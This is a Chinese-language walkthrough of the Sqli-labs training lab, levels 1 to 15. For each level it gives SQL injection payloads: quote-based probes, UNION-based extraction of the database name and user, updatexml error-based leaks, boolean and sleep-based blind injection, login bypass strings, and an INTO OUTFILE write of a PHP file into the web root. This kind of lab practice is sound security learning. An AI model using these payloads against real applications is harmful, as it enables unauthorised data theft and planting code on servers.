Sqli-labs 1-15

Less-1 基于单引号的字符型注入

注入语句：

id=1' and 1=1 -- a

1、判断注入点:

2、把1=1改成1=2，不报错也不显示任何信息，说明可以利用 ’ 字符注入

3、确定注入字符后，判断有多少列， 超出列数会报错

id=1' order by 4 -- -

4、判断数据显示点 （id一定要改为不存在的数）

id=520' union select 1,database(),3 -- -

5、然后便可在注入字符后加入前面的sql注入基本语句报出数据库信息了

less-2——正型注入

这题和上面的用法差不多不细讲，只是不是没有单引号
注入语句：

id=1 and 1=1 -- -

less-3——基于’)的字符型注入

注入语句：

id=1') and 1=1 -- -

后面操作同上

less-4——基于")字符型注入

注入语句：

id=1") and 1=1 -- -­

后面操作同上

less-5——基于’字符型的错误回显注入

注入语句：

1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

less-6——基于"字符型的错误回显注入

注入语句：

id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

less-7——文件读写注入

注入语句：

-1')) union select 1,2,'<?php phpinfo();?>' into outfile '/var/www/html/Less-7/test.php' -- -

访问自己写的文件：

less-8——基于’的布尔盲注

注入语句：

通过length()判断数据库的长度

id=1' and (length(database())=8) --+

接下来通过ascii一个一个猜

?id=1’ and (ascii(substr(database(),1,1))=115) --+

也可以写脚本得到数据库名

less-9——基于’的时间盲注

注入语句：

1' and if(length(database())>3 ,sleep(5),1) -- -

因为你不知道数据库名是几个字母，所以先让数字大于3进行判断，然后依次增加

如果sleep函数不起作用了，说明数据库名可能等于这个数。这时你就能判断它的数据库名长度啦

less-10——基于"的时间盲注

注入语句：

id=1" and if(length(database())>7 ,sleep(5),1) -- -

方法与第九关相同，将单引号改成双引号即可。

less-11——基于’的POST型注入

注入语句：

admin' and 1=1 -- -

直接用万能密码登陆：

less-12——基于")的POST型注入

注入语句：

admin") and 1=1 -- -

直接用万能密码登陆：

less-13——基于’)的错误回显注入

注入语句：

admin') union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

less-14——基于"的错误回显注入

注入语句：

admin" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

这里是双引号：

less-15——基于’布尔的盲注

注入语句：

admin' and (length(database())=8) -- -

得到数据库长度